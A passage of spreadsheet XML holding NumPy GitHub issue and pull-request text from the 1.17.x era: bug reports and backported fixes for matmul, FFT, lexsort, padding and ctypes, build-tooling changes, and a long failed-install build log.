_x000D_
@tacaswell I need some feedback from you on the section marked "XXX Tom".  It concerns the situation where a project releases directly after a *major* Python release.</t>
  </si>
  <si>
    <t>MAINT: Clarify policy language in NEP-29.</t>
  </si>
  <si>
    <t xml:space="preserve">- Create 1.17.2-changelog.rst_x000D_
- Update 1.17.2-notes.rst_x000D_
_x000D_
[ci skip]_x000D_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</si>
  <si>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REL: Prepare for NumPy 1.17.2 release.</t>
  </si>
  <si>
    <t>&lt;!-- Please be sure you are following the instructions in the dev guidelines
http://www.numpy.org/devdocs/dev/development_workflow.html
--&gt;
&lt;!-- We'd appreciate it if your commit message is properly formatted
http://www.numpy.org/devdocs/dev/development_workflow.html#writing-the-commit-message
--&gt;</t>
  </si>
  <si>
    <t>DOC: Make implementation bullet points consistent in NEP 29</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
_x000D_
Since the matrix A is its own square, the loop below should be infinite, but it terminates after 8 iterations. If `A = A.dot(A)` is used in place of `A = A @ A`, the loop is infinite as expected._x000D_
_x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
_x000D_
_x000D_
```python_x000D_
import numpy as np_x000D_
_x000D_
A = M = np.array([[ True, False],[True,True]])_x000D_
i = 0_x000D_
while (A == M).all():_x000D_
    i += 1_x000D_
    print(i, "A == M")_x000D_
    A = A @ A_x000D_
print(A)_x000D_
_x000D_
# 1 A == M_x000D_
# 2 A == M_x000D_
# 3 A == M_x000D_
# 4 A == M_x000D_
# 5 A == M_x000D_
# 6 A == M_x000D_
# 7 A == M_x000D_
# 8 A == M_x000D_
# [[ True False]_x000D_
#  [False  True]]_x000D_
```_x000D_
_x000D_
&lt;!-- Remove these sections for a feature request --&gt;_x000D_
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1.16.0rc1 3.7.2 (default, Jan  3 2019, 02:55:40) _x000D_
[GCC 8.2.0]_x000D_
</t>
  </si>
  <si>
    <t>matmul @ of boolean arrays gives inconsistent results</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14279, _x000D_
_x000D_
BUG: fix issue #14176_x000D_
_x000D_
This replaces the fct variable in pocketfft.py by its inverse, inv_fct. The actual factor is only built immediately before executing the FFT. This defers potential divide-by-zero exceptions until after the check for zero-length transforms._x000D_
_x000D_
The easiest way to backport #14279 was to copy `pocketfft.py` from master._x000D_
That also brings some improved documentation and other fixes with it, which_x000D_
cannot hurt._x000D_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</si>
  <si>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Update 1.17.x with 1.18.0-dev pocketfft.py.</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.fft']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13802._x000D_
_x000D_
Fixed maximum relative error reporting in `assert_allclose`._x000D_
_x000D_
In cases where the two arrays have zeros at the same positions it will_x000D_
no longer report nan as the max relative error._x000D_
_x000D_
Fixes #13801._x000D_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</si>
  <si>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Fixed maximum relative error reporting in assert_allclose</t>
  </si>
  <si>
    <t>['00 - Bug', '08 - Backport', 'component: numpy.testing']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport #14209. _x000D_
_x000D_
In case end_value was greater than the edge values of the array to pad, the resulting difference was negative and caused overflows in case the input array used unsigned types. Fixed by using 1.17 version of `linspace` instead of `_linear_ramp`._x000D_
_x000D_
Protect against this regression with a new test for all numeric dtypes._x000D_
_x000D_
Fixes #14191._x000D_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</si>
  <si>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uint-overflow if padding with linear_ramp and negative gain.</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', '08 - Backport', 'component: numpy.lib']</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #13802.  _x000D_
_x000D_
Fixed maximum relative error reporting in `assert_allclose`._x000D_
_x000D_
In cases where the two arrays have zeros at the same positions it will_x000D_
no longer report nan as the max relative error._x000D_
_x000D_
Fixes #13801._x000D_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</si>
  <si>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Fixed maximum relative error reporting in assert_allclose.</t>
  </si>
  <si>
    <t>While IPython seems to not print the module information (or only_x000D_
prints qualname), python adds the full module, so it needs to be_x000D_
overridden to not be printed on error._x000D_
_x000D_
---_x000D_
_x000D_
Followup to gh-13306.</t>
  </si>
  <si>
    <t>BUG: Do not show Override module in private error classes.</t>
  </si>
  <si>
    <t xml:space="preserve">We add the reference to `printoptions` context manager in "See Also" section in `set_printoptions` and `get_printoptions` functions. These changes improve the documentation and make it easy to search._x000D_
</t>
  </si>
  <si>
    <t>DOC: add the reference to 'printoptions'</t>
  </si>
  <si>
    <t xml:space="preserve">Backport of #14387._x000D_
_x000D_
Fixes gh-14214, using the test and code in the issue._x000D_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</si>
  <si>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test, fix regression in converting to ctypes.</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', '08 - Backport', 'component: numpy.ctypes']</t>
  </si>
  <si>
    <t xml:space="preserve">Fixes gh-14214, using the test and code in the issue._x000D_
_x000D_
</t>
  </si>
  <si>
    <t>BUG: test, fix regression in converting to ctypes</t>
  </si>
  <si>
    <t>['00 - Bug', '06 - Regression', 'component: numpy.ctypes']</t>
  </si>
  <si>
    <t>This fixes my own typo in #13979. The current exampple code is
_runnable_ but potentially confusing to read.</t>
  </si>
  <si>
    <t>DOC: Fix a minor typo in dispatch documentation.</t>
  </si>
  <si>
    <t>Fixes #14413.</t>
  </si>
  <si>
    <t>BUG: Fix aradixsort indirect indexing.</t>
  </si>
  <si>
    <t xml:space="preserve">Before this fix, a reference such as `numpy.wxyz` produced an_x000D_
incorrect error message because of the invalid format specifiers_x000D_
in the error message string:_x000D_
_x000D_
	&gt;&gt;&gt; import numpy_x000D_
	&gt;&gt;&gt; numpy.wxyz_x000D_
	Traceback (most recent call last):_x000D_
	  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
	  File "/.../numpy/__init__.py", line 206, in __getattr___x000D_
	    "module %s has no attribute $s".format(__name__, attr))_x000D_
	AttributeError: module %s has no attribute $s_x000D_
_x000D_
After the fix:_x000D_
_x000D_
	&gt;&gt;&gt; import numpy_x000D_
	&gt;&gt;&gt; numpy.wxyz_x000D_
	Traceback (most recent call last):_x000D_
	  File "&lt;stdin&gt;", line 1, in &lt;module&gt;_x000D_
	  File "/.../numpy/__init__.py", line 206, in __getattr___x000D_
	    "{!r}".format(__name__, attr))_x000D_
	AttributeError: module 'numpy' has no attribute 'wxyz'_x000D_
</t>
  </si>
  <si>
    <t>BUG: Fix format statement associated with AttributeError.</t>
  </si>
  <si>
    <t>Changing the dtype of a lexsort argument like this should not change the result, but it does with numpy 1.17.0 and 1.17.1:_x000D_
_x000D_
```python_x000D_
np.lexsort((np.array([0, 1, 2, 0]), np.array([0, 0, 0, 1], dtype='int8'))) # [0, 3, 1, 2]_x000D_
np.lexsort((np.array([0, 1, 2, 0]), np.array([0, 0, 0, 1], dtype='int32'))) # [0, 1, 2, 3]_x000D_
```_x000D_
_x000D_
The problem does not affect 1.16.4 so this is a regression._x000D_
_x000D_
```_x000D_
1.17.1_x000D_
3.6.1 (v3.6.1:69c0db5, Mar 21 2017, 18:41:36) [MSC v.1900 64 bit (AMD64)]_x000D_
```_x000D_
_x000D_
(Can also reproduce on `3.7.1 (default, Dec 14 2018, 19:28:38) \n[GCC 7.3.0]` so it's not a Windows thing)</t>
  </si>
  <si>
    <t>Regression: lexsort gives wrong results on short integer types</t>
  </si>
  <si>
    <t xml:space="preserve">Create dependabot config and schedule weekly checks of dependency versions._x000D_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</si>
  <si>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TST: Add dependabot config file.</t>
  </si>
  <si>
    <t>['05 - Testing', 'component: CI']</t>
  </si>
  <si>
    <t xml:space="preserve">The command line version of `cython` may point to a different_x000D_
installation of Cython than that installed in the Python running the_x000D_
cythonize script. Because the Cython version can be critical, requiring_x000D_
that the cython used comes from a known place makes it less likely that_x000D_
the wrong version will be used. This treats Cython as a build dependency_x000D_
rather than a free standing compiler._x000D_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</si>
  <si>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BLD: Only allow using Cython module when cythonizing.</t>
  </si>
  <si>
    <t>['03 - Maintenance', '32 - Installation', 'component: build']</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;!-- Please describe the issue in detail here, and fill in the fields below --&gt;_x000D_
I am seeing a difference in results for np.fft.fft2 in the order of 1e-11 on both real and imaginary values running it on two versions of numpy- v1.12.1 and v1.16.0. According to my test, similar thing happens for v1.14.0 (More consistent with v1.16.0)_x000D_
_x000D_
The results of image_fft on v1.12.1 and v1.16 are different when compared. One way I compared was taking a sum of the entire image_fft. _x000D_
For v1.12.1 I found it to be: (60000.000000000007-7.2759576141834259e-12j)_x000D_
For v1.16.0 I found it to be: (59999.99999999999+2.1827872842550278e-11j)_x000D_
Basically the issue here is if results of image_fft is saved from two versions, they don't match when compared using np.array_equal($1, $2)_x000D_
_x000D_
The environment in which I am producing the results are exactly same and are as follows:_x000D_
- Docker container of Ubuntu 16.04 LTS_x000D_
- Python details are: _x000D_
Python 3.5.2 |Anaconda custom (64-bit)| (default, Jul  2 2016, 17:53:06)_x000D_
[GCC 4.4.7 20120313 (Red Hat 4.4.7-1)] on linux_x000D_
_x000D_
I had v1.12.1 installed first on numpy and next I installed numpy == 1.16.0 using pip install numpy==1.16.0_x000D_
_x000D_
Let me know more infos are required._x000D_
### Reproducing code example:_x000D_
_x000D_
&lt;!-- A short code example that reproduces the problem/missing feature. It should be_x000D_
self-contained, i.e., possible to run as-is via 'python myproblem.py' --&gt;_x000D_
A way to generate it is:_x000D_
```python_x000D_
import numpy as np_x000D_
image = np.ones((150,100))_x000D_
(a,b) = image.shape_x000D_
image_tmp = np.zeros(shape=(2*a,2*b))_x000D_
image_tmp[0:a,0:b]=image_x000D_
image_fft = np.fft.fft2(image_tmp)_x000D_
```_x000D_
_x000D_
### Numpy/Python version information:_x000D_
_x000D_
&lt;!-- Output from 'import sys, numpy; print(numpy.__version__, sys.version)' --&gt;_x000D_
**For v1.12.1:**_x000D_
1.12.1 3.5.2 |Anaconda custom (64-bit)| (default, Jul  2 2016, 17:53:06)_x000D_
[GCC 4.4.7 20120313 (Red Hat 4.4.7-1)]_x000D_
_x000D_
**For v1.16.0:**_x000D_
1.16.0 3.5.2 |Anaconda custom (64-bit)| (default, Jul  2 2016, 17:53:06)_x000D_
[GCC 4.4.7 20120313 (Red Hat 4.4.7-1)]_x000D_
</t>
  </si>
  <si>
    <t xml:space="preserve">np.fft.fft2 results are different on numpy v1.12.1 and v1.16.0 in the order of e-10 </t>
  </si>
  <si>
    <t>['29 - Intel/Anaconda', '57 - Close?']</t>
  </si>
  <si>
    <t>Since we now have a dependabot service, this test run is not needed._x000D_
_x000D_
Might be nice to add a `.dependabot/config.yml` file too</t>
  </si>
  <si>
    <t>TST: Remove build job since we now use Dependabot</t>
  </si>
  <si>
    <t>If I initialize a numpy array of C `char` and try to convert it to numpy booleans, it throws an error whenever it encounters a zero (`false`)._x000D_
_x000D_
```python_x000D_
import numpy as np, ctypes_x000D_
np.zeros(5, dtype = ctypes.c_char).astype("bool")_x000D_
```_x000D_
```_x000D_
---------------------------------------------------------------------------_x000D_
ValueError                                Traceback (most recent call last)_x000D_
&lt;ipython-input-11-284bcf3dfeb8&gt; in &lt;module&gt;_x000D_
      1 import numpy as np, ctypes_x000D_
----&gt; 2 np.zeros(5, dtype = ctypes.c_char).astype("bool")_x000D_
_x000D_
ValueError: invalid literal for int() with base 10: ''_x000D_
```</t>
  </si>
  <si>
    <t>Converting char to bool fails when it encounters false</t>
  </si>
  <si>
    <t xml:space="preserve">Make it less likely that the wrong cython version is used for_x000D_
building or cythonizing NumPy. This is motivated by the upcoming_x000D_
Python 3.8 release that requires the cython 0.29.13 as of 3.8.0b4._x000D_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</si>
  <si>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BLD: Update RELEASE_WALKTHROUGH and cythonize.</t>
  </si>
  <si>
    <t>['32 - Installation', 'component: Documentation', 'component: build']</t>
  </si>
  <si>
    <t>I tried to install numpy 1.17.1 in CPython 3.8.0b4 (using pyenv) and failed. Latest Linux Mint._x000D_
_x000D_
```_x000D_
$ python -c "import sys; print(sys.version)"_x000D_
3.8.0b4 (default, Aug 31 2019, 09:52:04) _x000D_
[GCC 7.4.0]_x000D_
```_x000D_
_x000D_
&lt;details&gt;_x000D_
_x000D_
```_x000D_
$ pip install numpy_x000D_
Collecting numpy_x000D_
  Using cached https://files.pythonhosted.org/packages/cb/79/96df883cd6df0c86cb010e6f4ff790b7a30a45016a9509c94ea72c8695cd/numpy-1.17.1.zip_x000D_
Installing collected packages: numpy_x000D_
  Running setup.py install for numpy: started_x000D_
    Running setup.py install for numpy: still running..._x000D_
    Running setup.py install for numpy: finished with status 'error'_x000D_
    ERROR: Command errored out with exit status 1:_x000D_
     command: /home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/bin/python3.8 -u -c 'import sys, setuptools, tokenize; sys.argv[0] = '"'"'/tmp/pip-install-v8azo_e6/numpy/setup.py'"'"'; __file__='"'"'/tmp/pip-install-v8azo_e6/numpy/setup.py'"'"';f=getattr(tokenize, '"'"'open'"'"', open)(__file__);code=f.read().replace('"'"'\r\n'"'"', '"'"'\n'"'"');f.close();exec(compile(code, __file__, '"'"'exec'"'"'))' install --record /tmp/pip-record-u61nw4qm/install-record.txt --single-version-externally-managed --compile --install-headers /home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/include/site/python3.8/numpy_x000D_
         cwd: /tmp/pip-install-v8azo_e6/numpy/_x000D_
    Complete output (2864 lines):_x000D_
    Running from numpy source directory._x000D_
    _x000D_
    Note: if you need reliable uninstall behavior, then install_x000D_
    with pip instead of using `setup.py install`:_x000D_
    _x000D_
      - `pip install .`       (from a git repo or downloaded source_x000D_
                               release)_x000D_
      - `pip install numpy`   (last NumPy release on PyPi)_x000D_
    _x000D_
    _x000D_
    blas_opt_info:_x000D_
    blas_mkl_info:_x000D_
    customize UnixCCompiler_x000D_
      libraries mkl_rt not found in ['/home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib', '/usr/local/lib', '/usr/lib', '/usr/lib/x86_64-linux-gnu']_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    blis_info:_x000D_
    customize UnixCCompiler_x000D_
      libraries blis not found in ['/home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib', '/usr/local/lib', '/usr/lib', '/usr/lib/x86_64-linux-gnu']_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    openblas_info:_x000D_
    customize UnixCCompiler_x000D_
    customize UnixCCompiler_x000D_
      libraries openblas not found in ['/home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib', '/usr/local/lib', '/usr/lib', '/usr/lib/x86_64-linux-gnu']_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    atlas_3_10_blas_threads_info:_x000D_
    Setting PTATLAS=ATLAS_x000D_
    customize UnixCCompiler_x000D_
      libraries tatlas not found in ['/home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib', '/usr/local/lib', '/usr/lib', '/usr/lib/x86_64-linux-gnu']_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    atlas_3_10_blas_info:_x000D_
    customize UnixCCompiler_x000D_
      libraries satlas not found in ['/home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib', '/usr/local/lib', '/usr/lib', '/usr/lib/x86_64-linux-gnu']_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    atlas_blas_threads_info:_x000D_
    Setting PTATLAS=ATLAS_x000D_
    customize UnixCCompiler_x000D_
      libraries ptf77blas,ptcblas,atlas not found in ['/home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib', '/usr/local/lib', '/usr/lib', '/usr/lib/x86_64-linux-gnu']_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    atlas_blas_info:_x000D_
    customize UnixCCompiler_x000D_
      libraries f77blas,cblas,atlas not found in ['/home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib', '/usr/local/lib', '/usr/lib', '/usr/lib/x86_64-linux-gnu']_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    accelerate_info:_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    /tmp/pip-install-v8azo_e6/numpy/numpy/distutils/system_info.py:690: UserWarning:_x000D_
        Optimized (vendor) Blas libraries are not found._x000D_
        Falls back to netlib Blas library which has worse performance._x000D_
        A better performance should be easily gained by switching_x000D_
        Blas library._x000D_
      self.calc_info()_x000D_
    blas_info:_x000D_
    customize UnixCCompiler_x000D_
      libraries blas not found in ['/home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib', '/usr/local/lib', '/usr/lib', '/usr/lib/x86_64-linux-gnu']_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    /tmp/pip-install-v8azo_e6/numpy/numpy/distutils/system_info.py:690: UserWarning:_x000D_
        Blas (http://www.netlib.org/blas/) libraries not found._x000D_
        Directories to search for the libraries can be specified in the_x000D_
        numpy/distutils/site.cfg file (section [blas]) or by setting_x000D_
        the BLAS environment variable._x000D_
      self.calc_info()_x000D_
    blas_src_info:_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    /tmp/pip-install-v8azo_e6/numpy/numpy/distutils/system_info.py:690: UserWarning:_x000D_
        Blas (http://www.netlib.org/blas/) sources not found._x000D_
        Directories to search for the sources can be specified in the_x000D_
        numpy/distutils/site.cfg file (section [blas_src]) or by setting_x000D_
        the BLAS_SRC environment variable._x000D_
      self.calc_info()_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    /bin/sh: 1: svnversion: not found_x000D_
    non-existing path in 'numpy/distutils': 'site.cfg'_x000D_
    lapack_opt_info:_x000D_
    lapack_mkl_info:_x000D_
    customize UnixCCompiler_x000D_
      libraries mkl_rt not found in ['/home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib', '/usr/local/lib', '/usr/lib', '/usr/lib/x86_64-linux-gnu']_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    openblas_lapack_info:_x000D_
    customize UnixCCompiler_x000D_
    customize UnixCCompiler_x000D_
      libraries openblas not found in ['/home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib', '/usr/local/lib', '/usr/lib', '/usr/lib/x86_64-linux-gnu']_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    openblas_clapack_info:_x000D_
    customize UnixCCompiler_x000D_
    customize UnixCCompiler_x000D_
      libraries openblas,lapack not found in ['/home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib', '/usr/local/lib', '/usr/lib', '/usr/lib/x86_64-linux-gnu']_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    flame_info:_x000D_
    customize UnixCCompiler_x000D_
      libraries flame not found in ['/home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib', '/usr/local/lib', '/usr/lib', '/usr/lib/x86_64-linux-gnu']_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    atlas_3_10_threads_info:_x000D_
    Setting PTATLAS=ATLAS_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries tatlas,tatlas not found in /home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /usr/local/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries tatlas,tatlas not found in /usr/local/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /usr/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries tatlas,tatlas not found in /usr/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /usr/lib/x86_64-linux-gnu_x000D_
    customize UnixCCompiler_x000D_
      libraries tatlas,tatlas not found in /usr/lib/x86_64-linux-gnu_x000D_
    &lt;class 'numpy.distutils.system_info.atlas_3_10_threads_info'&gt;_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    atlas_3_10_info:_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries satlas,satlas not found in /home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /usr/local/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries satlas,satlas not found in /usr/local/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /usr/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries satlas,satlas not found in /usr/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /usr/lib/x86_64-linux-gnu_x000D_
    customize UnixCCompiler_x000D_
      libraries satlas,satlas not found in /usr/lib/x86_64-linux-gnu_x000D_
    &lt;class 'numpy.distutils.system_info.atlas_3_10_info'&gt;_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    atlas_threads_info:_x000D_
    Setting PTATLAS=ATLAS_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries ptf77blas,ptcblas,atlas not found in /home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /usr/local/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries ptf77blas,ptcblas,atlas not found in /usr/local/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /usr/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries ptf77blas,ptcblas,atlas not found in /usr/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /usr/lib/x86_64-linux-gnu_x000D_
    customize UnixCCompiler_x000D_
      libraries ptf77blas,ptcblas,atlas not found in /usr/lib/x86_64-linux-gnu_x000D_
    &lt;class 'numpy.distutils.system_info.atlas_threads_info'&gt;_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    atlas_info:_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries f77blas,cblas,atlas not found in /home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /usr/local/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries f77blas,cblas,atlas not found in /usr/local/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /usr/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries f77blas,cblas,atlas not found in /usr/lib_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack_atlas not found in /usr/lib/x86_64-linux-gnu_x000D_
    customize UnixCCompiler_x000D_
      libraries f77blas,cblas,atlas not found in /usr/lib/x86_64-linux-gnu_x000D_
    &lt;class 'numpy.distutils.system_info.atlas_info'&gt;_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    lapack_info:_x000D_
    customize UnixCCompiler_x000D_
      libraries lapack not found in ['/home/juanlu/.pyenv/versions/3.8.0b4/envs/_test_numpy38b4/lib', '/usr/local/lib', '/usr/lib', '/usr/lib/x86_64-linux-gnu']_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    /tmp/pip-install-v8azo_e6/numpy/numpy/distutils/system_info.py:1712: UserWarning:_x000D_
        Lapack (http://www.netlib.org/lapack/) libraries not found._x000D_
        Directories to search for the libraries can be specified in the_x000D_
        numpy/distutils/site.cfg file (section [lapack]) or by setting_x000D_
        the LAPACK environment variable._x000D_
      if getattr(self, '_calc_info_{}'.format(lapack))():_x000D_
    lapack_src_info:_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    /tmp/pip-install-v8azo_e6/numpy/numpy/distutils/system_info.py:1712: UserWarning:_x000D_
        Lapack (http://www.netlib.org/lapack/) sources not found._x000D_
        Directories to search for the sources can be specified in the_x000D_
        numpy/distutils/site.cfg file (section [lapack_src]) or by setting_x000D_
        the LAPACK_SRC environment variable._x000D_
      if getattr(self, '_calc_info_{}'.format(lapack))():_x000D_
      NOT AVAILABLE_x000D_
    _x000D_
    non-existing path in 'numpy/random': 'src/splitmix64/splitmix.h'_x000D_
    /home/juanlu/.pyenv/versions/3.8.0b4/lib/python3.8/distutils/dist.py:274: UserWarning: Unknown distribution option: 'define_macros'_x000D_
      warnings.warn(msg)_x000D_
    running install_x000D_
    running build_x000D_
    running config_cc_x000D_
    unifing config_cc, config, build_clib, build_ext, build commands --compiler options_x000D_
    running config_fc_x000D_
    unifing config_fc, config, build_clib, build_ext, build commands --fcompiler options_x000D_
    running build_src_x000D_
    build_src_x000D_
    building py_modules sources_x000D_
    creating build_x000D_
    creating build/src.linux-x86_64-3.8_x000D_
    creating build/src.linux-x86_64-3.8/numpy_x000D_
    creating build/src.linux-x86_64-3.8/numpy/distutils_x000D_
    building library "npymath" sources_x000D_
    get_default_fcompiler: matching types: '['gnu95', 'intel', 'lahey', 'pg', 'absoft', 'nag', 'vast', 'compaq', 'intele', 'intelem', 'gnu', 'g95', 'pathf95', 'nagfor']'_x000D_
    customize Gnu95FCompiler_x000D_
    Could not locate executable gfortran_x000D_
    Could not locate executable f95_x000D_
    customize IntelFCompiler_x000D_
    Could not locate executable ifort_x000D_
    Could not locate executable ifc_x000D_
    customize LaheyFCompiler_x000D_
    Could not locate executable lf95_x000D_
    customize PGroupFCompiler_x000D_
    Could not locate executable pgfortran_x000D_
    customize AbsoftFCompiler_x000D_
    Could not locate executable f90_x000D_
    Could not locate executable f77_x000D_
    customize NAGFCompiler_x000D_
    customize VastFCompiler_x000D_
    customize CompaqFCompiler_x000D_
    Could not locate executable fort_x000D_
    customize IntelItaniumFCompiler_x000D_
    Could not locate executable efort_x000D_
    Could not locate executable efc_x000D_
    customize IntelEM64TFCompiler_x000D_
    customize GnuFCompiler_x000D_
    Could not locate executable g77_x000D_
    customize G95FCompiler_x000D_
    Could not locate executable g95_x000D_
    customize PathScaleFCompiler_x000D_
    Could not locate executable pathf95_x000D_
    customize NAGFORCompiler_x000D_
    Could not locate executable nagfor_x000D_
    don't know how to compile Fortran code on platform 'posix'_x000D_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gcc -pthread _configtest.o -o _configtest_x000D_
    success!_x000D_
    removing: _configtest.c _configtest.o _configtest.o.d _configtest_x000D_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_configtest.c:1:5: warning: conflicting types for built-in function ‘exp’ [-Wbuiltin-declaration-mismatch]_x000D_
     int exp (void);_x000D_
         ^~~_x000D_
    gcc -pthread _configtest.o -o _configtest_x000D_
    _configtest.o: In function `main':_x000D_
    /tmp/pip-install-v8azo_e6/numpy/_configtest.c:6: undefined reference to `exp'_x000D_
    collect2: error: ld returned 1 exit status_x000D_
    failure._x000D_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_configtest.c:1:5: warning: conflicting types for built-in function ‘exp’ [-Wbuiltin-declaration-mismatch]_x000D_
     int exp (void);_x000D_
         ^~~_x000D_
    gcc -pthread _configtest.o -lm -o _configtest_x000D_
    success!_x000D_
    removing: _configtest.c _configtest.o _configtest.o.d _configtest_x000D_
    creating build/src.linux-x86_64-3.8/numpy/core_x000D_
    creating build/src.linux-x86_64-3.8/numpy/core/src_x000D_
    creating build/src.linux-x86_64-3.8/numpy/core/src/npymath_x000D_
    conv_template:&gt; build/src.linux-x86_64-3.8/numpy/core/src/npymath/npy_math_internal.h_x000D_
      adding 'build/src.linux-x86_64-3.8/numpy/core/src/npymath' to include_dirs._x000D_
    conv_template:&gt; build/src.linux-x86_64-3.8/numpy/core/src/npymath/ieee754.c_x000D_
    conv_template:&gt; build/src.linux-x86_64-3.8/numpy/core/src/npymath/npy_math_complex.c_x000D_
    None - nothing done with h_files = ['build/src.linux-x86_64-3.8/numpy/core/src/npymath/npy_math_internal.h']_x000D_
    building library "npysort" sources_x000D_
    creating build/src.linux-x86_64-3.8/numpy/core/src/common_x000D_
    conv_template:&gt; build/src.linux-x86_64-3.8/numpy/core/src/common/npy_sort.h_x000D_
      adding 'build/src.linux-x86_64-3.8/numpy/core/src/common' to include_dirs._x000D_
    creating build/src.linux-x86_64-3.8/numpy/core/src/npysort_x000D_
    conv_template:&gt; build/src.linux-x86_64-3.8/numpy/core/src/npysort/quicksort.c_x000D_
    conv_template:&gt; build/src.linux-x86_64-3.8/numpy/core/src/npysort/mergesort.c_x000D_
    conv_template:&gt; build/src.linux-x86_64-3.8/numpy/core/src/npysort/timsort.c_x000D_
    conv_template:&gt; build/src.linux-x86_64-3.8/numpy/core/src/npysort/heapsort.c_x000D_
    conv_template:&gt; build/src.linux-x86_64-3.8/numpy/core/src/npysort/radixsort.c_x000D_
    conv_template:&gt; build/src.linux-x86_64-3.8/numpy/core/src/common/npy_partition.h_x000D_
    conv_template:&gt; build/src.linux-x86_64-3.8/numpy/core/src/npysort/selection.c_x000D_
    conv_template:&gt; build/src.linux-x86_64-3.8/numpy/core/src/common/npy_binsearch.h_x000D_
    conv_template:&gt; build/src.linux-x86_64-3.8/numpy/core/src/npysort/binsearch.c_x000D_
    None - nothing done with h_files = ['build/src.linux-x86_64-3.8/numpy/core/src/common/npy_sort.h', 'build/src.linux-x86_64-3.8/numpy/core/src/common/npy_partition.h', 'build/src.linux-x86_64-3.8/numpy/core/src/common/npy_binsearch.h']_x000D_
    building extension "numpy.core._dummy" sources_x000D_
